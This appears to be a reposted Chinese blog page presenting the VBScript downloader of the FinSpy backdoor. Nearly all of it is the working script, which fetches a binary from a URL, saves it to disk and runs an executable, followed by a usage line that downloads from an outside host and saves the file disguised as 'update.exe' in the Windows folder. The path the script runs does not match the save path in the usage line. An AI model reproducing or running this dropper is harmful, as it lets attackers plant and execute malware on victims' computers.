FinSpy的后门下载代码
Posted passedbylove
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了FinSpy的后门下载代码相关的知识,希望对你有一定的参考价值。
c:\\windows\\apsou.vbs
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))
BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite
Function BinaryGetURL(URL)
Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
Http.Open "GET", URL, False
Http.Send
BinaryGetURL = Http.ResponseBody
End Function
Set shell = CreateObject("WScript.Shell")
shell.Run "d:\\update.exe"
调用方法
start C:\\\\windows\\\\apsou.vbs http://www.codito.de/b00m/calc.exe C:\\\\windows\\\\update.exe
以上是关于FinSpy的后门下载代码的主要内容,如果未能解决你的问题,请参考以下文章